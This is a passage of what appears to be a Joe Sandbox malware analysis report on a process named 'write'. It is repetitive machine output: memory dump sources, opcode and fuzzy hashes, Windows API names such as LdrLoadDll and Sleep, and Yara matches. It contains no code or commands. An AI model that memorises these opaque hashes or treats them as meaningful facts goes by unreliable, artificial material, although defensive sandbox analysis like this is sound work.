                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 065903eec688b22cc1249805a21584f6dc960df2be142862e984d9e80070bb9b
                                                                      • Instruction ID: d795f20d430a03219c350e591ba833700bf5c3c0d0a065acd209dc0d71b50c6d
                                                                      • Opcode Fuzzy Hash: 065903eec688b22cc1249805a21584f6dc960df2be142862e984d9e80070bb9b
                                                                      • Instruction Fuzzy Hash: 33900231615404129540715849C454750969BF0301F92C415E4414554CCE6489576365
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                      • Instruction ID: bc18e21400e72bb74933ab1d259370547d842dbae816c4d8050790f063d417da
                                                                      • Opcode Fuzzy Hash: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                      • Instruction Fuzzy Hash: AF90023121100813D51161584684707109A8BE0241FD2C816A4414558DDAA68953B125
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a782952593b9926f3bcaed43155579461b99a605faf575bcfa78d0d2142d6ee0
                                                                      • Instruction ID: 1abfb38f53da48c2a0f59efb94c747810fb821abbe0fad337a927981d150523a
                                                                      • Opcode Fuzzy Hash: a782952593b9926f3bcaed43155579461b99a605faf575bcfa78d0d2142d6ee0
                                                                      • Instruction Fuzzy Hash: 4D90022161100902D50171584584617109B8BE0241FD2C426A5014555ECE758993B135
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                      • Instruction ID: 5ee05724c9033449de5c4fa94b028e61a70db692b3ace4404221404f8aad6e74
                                                                      • Opcode Fuzzy Hash: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                      • Instruction Fuzzy Hash: CD90022922300402D5807158558860B10968BE1202FD2D819A4005558CCD65886A6325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 86a1a793f498d8b808acdd36acfdd136ace1dcfbacdfa478d429d18099f709a4
                                                                      • Instruction ID: fff10f34023303ad7b32bcb7f0ae8579212287da8dc9c55b4ab6ada055007474
                                                                      • Opcode Fuzzy Hash: 86a1a793f498d8b808acdd36acfdd136ace1dcfbacdfa478d429d18099f709a4
                                                                      • Instruction Fuzzy Hash: 5090022131100403D540715855986075096DBF1301F92D415E4404554CDD6588576226
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                      • Instruction ID: e40550c31c5cb1b014ba43387f3b0215cd0c56fcc8ac08adb51e62e216fd85c9
                                                                      • Opcode Fuzzy Hash: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                      • Instruction Fuzzy Hash: 35900221252045525945B158458450750979BF0241BD2C416A5404950CC9769857E625
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                      • Instruction ID: 7e82da6391b80e601e0b8cc97fe033890d0bd56b3069326c0d25f0a4553f7318
                                                                      • Opcode Fuzzy Hash: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                      • Instruction Fuzzy Hash: A490022122180442D60065684D94B0710968BE0303F92C519A4144554CCD6588626525
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8ec5be4d1d858b98caf203f2f5d075dc5ead1fe7798965478e251dfc7d074d7b
                                                                      • Instruction ID: 6ba096ee7215bf48fb5d564e91b829f563eb3de2f35798a36ee5ed56e1fcfc1c
                                                                      • Opcode Fuzzy Hash: 8ec5be4d1d858b98caf203f2f5d075dc5ead1fe7798965478e251dfc7d074d7b
                                                                      • Instruction Fuzzy Hash: 4390026121140803D5406558498460710968BE0302F92C415A6054555ECE798C527139
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                      • Instruction ID: 1f35bcc8f715d3eec907510a8857f07b7bc95dd957130c554ae4e54037b368e9
                                                                      • Opcode Fuzzy Hash: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                      • Instruction Fuzzy Hash: 0A90026135100842D50061584594B071096CBF1301F92C419E5054554DCA69CC53712A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a3968d154b1935860ec60c21866ee159ae71ef30a0a4a3ace70060438bca2070
                                                                      • Instruction ID: 8d6cb4a5066903e01080f8fe0ff88ede417817131a72d22d4ae81f371bff83c2
                                                                      • Opcode Fuzzy Hash: a3968d154b1935860ec60c21866ee159ae71ef30a0a4a3ace70060438bca2070
                                                                      • Instruction Fuzzy Hash: 3B900221611004424540716889C49075096AFF1211B92C525A4988550DC9A988666669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                      • Instruction ID: 97dc27476585df236e42d7f8009e130256cbe587936cfca9309cc9b120d3550e
                                                                      • Opcode Fuzzy Hash: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                      • Instruction Fuzzy Hash: 55900225221004030505A558078450710D78BE5351792C425F5005550CDA7188626125
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                      • Instruction ID: 79db5b3cb3ad280e5f22248d264afbcae34e65fcf786a8a909b789cb696b03b0
                                                                      • Opcode Fuzzy Hash: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                      • Instruction Fuzzy Hash: FF90023121504C42D54071584584A4710A68BE0305F92C415A4054694DDA758D56B665
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fdb60f20c0e028bae837bbfd860fd9525116fe4afca68c821f634693a5516ba9
                                                                      • Instruction ID: 7e17f2942ee0c0b65f6b507d1f745e42aa38a5a294123b8b0eb077b97a85a17d
                                                                      • Opcode Fuzzy Hash: fdb60f20c0e028bae837bbfd860fd9525116fe4afca68c821f634693a5516ba9
                                                                      • Instruction Fuzzy Hash: 2890023121100C02D5807158458464B10968BE1301FD2C419A4015654DCE658A5A77A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: eed08dfc9e58b0fedd10c623c0b33986b4277077c3cc5c42ee6cfacea8ae5547
                                                                      • Instruction ID: 127e0515ccf8800dc92144452d493a2328c94ad49d96b58b7370ec2bd875c04b
                                                                      • Opcode Fuzzy Hash: eed08dfc9e58b0fedd10c623c0b33986b4277077c3cc5c42ee6cfacea8ae5547
                                                                      • Instruction Fuzzy Hash: 1190023121100C42D50061584584B4710968BF0301F92C41AA4114654DCA65C8527525
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 72a73bb5cbf2047cf9dde0cbfddf03ffe4e716436d49c37ea29f0752bf825b94
                                                                      • Instruction ID: a8a877c429b9ebf04bef8f493360cdd7688f7d75a66cfb461ec42a1487114a1e
                                                                      • Opcode Fuzzy Hash: 72a73bb5cbf2047cf9dde0cbfddf03ffe4e716436d49c37ea29f0752bf825b94
                                                                      • Instruction Fuzzy Hash: 8390023121108C02D5106158858474B10968BE0301F96C815A8414658DCAE588927125
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f75cef70d88e93de9493d172a15dcb4675ace0aa7a2014eae244d483edab2a7f
                                                                      • Instruction ID: 1751cad67316476881a60905789203ac61ff16ea98c63bbfa475adb21ad8e233
                                                                      • Opcode Fuzzy Hash: f75cef70d88e93de9493d172a15dcb4675ace0aa7a2014eae244d483edab2a7f
                                                                      • Instruction Fuzzy Hash: 1D90023121100802D5006598558864710968BF0301F92D415A9014555ECAB588927135
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 40fa58e1bc029964f33cac9d419a67696e6f79186068b601742163a1565772c5
                                                                      • Instruction ID: da73d9008f7c1360b81d8fcac43ec342677065307f9920c5c7743eab50ae256e
                                                                      • Opcode Fuzzy Hash: 40fa58e1bc029964f33cac9d419a67696e6f79186068b601742163a1565772c5
                                                                      • Instruction Fuzzy Hash: B7900225231004020545A558078450B14D69BE63517D2C419F5406590CCA7188666325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8b764f595f4c89acfb9a1886d17b6da8c8f069f5e38126629b816d1030ec30ae
                                                                      • Instruction ID: e9514cdb9d50b62101978946cd0577b9e5b09e7079e826dcc99d0acb75dc1f40
                                                                      • Opcode Fuzzy Hash: 8b764f595f4c89acfb9a1886d17b6da8c8f069f5e38126629b816d1030ec30ae
                                                                      • Instruction Fuzzy Hash: 2190026121200403450571584594617509B8BF0201F92C425E5004590DC97588927129
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ebe4c512541e511408aa513ff88961452375362e006d69be07206dd5458fa0a6
                                                                      • Instruction ID: f3468135c6ec9b23786cce8881ee06f954bb1a8961d03e0b00ebb87c29d9a168
                                                                      • Opcode Fuzzy Hash: ebe4c512541e511408aa513ff88961452375362e006d69be07206dd5458fa0a6
                                                                      • Instruction Fuzzy Hash: 4990023161500C02D5507158459474710968BE0301F92C415A4014654DCBA58A5676A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9e66318e05cc2821bd88d2a6b4af3e41465ad8d144210a42617fa70c26c803cc
                                                                      • Instruction ID: 22de708d928f169b4f33f90d8da54ea17aadbc4e52ef4e0a3427941ceb9da5df
                                                                      • Opcode Fuzzy Hash: 9e66318e05cc2821bd88d2a6b4af3e41465ad8d144210a42617fa70c26c803cc
                                                                      • Instruction Fuzzy Hash: 8A90023161510802D5006158469470720968BE0201FA2C815A4414568DCBE5895275A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e6a80972fab1eb6f419da7a698fd1b06c17c27394570a9fe72341fe5a2e54c12
                                                                      • Instruction ID: cf87034170d0ac47638405b592505f450ad624fd2874f65b63b063e7696c8b9d
                                                                      • Opcode Fuzzy Hash: e6a80972fab1eb6f419da7a698fd1b06c17c27394570a9fe72341fe5a2e54c12
                                                                      • Instruction Fuzzy Hash: 6C90022125505502D550715C45846175096ABF0201F92C425A4804594DC9A588567225
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02FE25FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: dee1a7267480a6645100b6b4f85ff73ac5124cc57e512e030007053e87e1fcf6
                                                                      • Instruction ID: 508077e258004517a99241a8af12f35e2b649be67b7859c0af73b2c4404e05cc
                                                                      • Opcode Fuzzy Hash: dee1a7267480a6645100b6b4f85ff73ac5124cc57e512e030007053e87e1fcf6
                                                                      • Instruction Fuzzy Hash: 553181B1601705ABDB15DF64DC80FE7BBADAF88340F00852DAB1A5B241D770AA04CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 02FDE5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 2538663250-2016760708
                                                                      • Opcode ID: e90139b337f567662389e40ade324a7c46449102db4f82f65b2e40e86558d92e
                                                                      • Instruction ID: c4f357fccdd1a92d2e385e90626233bcd70338e2be57301fb16a3dbcb795d331
                                                                      • Opcode Fuzzy Hash: e90139b337f567662389e40ade324a7c46449102db4f82f65b2e40e86558d92e
                                                                      • Instruction Fuzzy Hash: 423152B5A0020A9FDB10DFD8CC809EEB7BABF88304B144559E615EB255D771EE45CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 02FDE5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 2538663250-2016760708
                                                                      • Opcode ID: 38df6f3c4c138751c3169abd1c9c470e93bbb94b89c2a4afe3fec82ae3de47f9
                                                                      • Instruction ID: 546aacbc5faf63c27463b9bd9dabb1b4638a51ffe83b49b2e3eef0397a7871cc
                                                                      • Opcode Fuzzy Hash: 38df6f3c4c138751c3169abd1c9c470e93bbb94b89c2a4afe3fec82ae3de47f9
                                                                      • Instruction Fuzzy Hash: C63141B5A1020A9FDB00DFD8CC809EFB7BABF88304B148559E615AB254D771EE05CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD3E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: e4842814de08bc3b5e29044e460439250995399e43b22710c28a50f979cb46de
                                                                      • Instruction ID: 315eae56191ca6c513ef54bdd55670f7c666e177ca671c2b26df6b9b8cfe1dfe
                                                                      • Opcode Fuzzy Hash: e4842814de08bc3b5e29044e460439250995399e43b22710c28a50f979cb46de
                                                                      • Instruction Fuzzy Hash: 50318971E0414AABDB16DBA49C42FEDBB769F92644F1842CDE604DB242E222D509CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02FD774C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 7b50296e91cdd66040bfea1df419a16488ff8a9236b97a8f0e64ace229af42a5
                                                                      • Instruction ID: 3cb47bc0f2aa26090858f8ba1555b6a9256472b9f6baf1c754e7545c2e46f1a5
                                                                      • Opcode Fuzzy Hash: 7b50296e91cdd66040bfea1df419a16488ff8a9236b97a8f0e64ace229af42a5
                                                                      • Instruction Fuzzy Hash: EC2133269A82854FDB2777788C82BBAFF129F43790F6C1A8CD5C0CE1D3D2209002C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD3E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
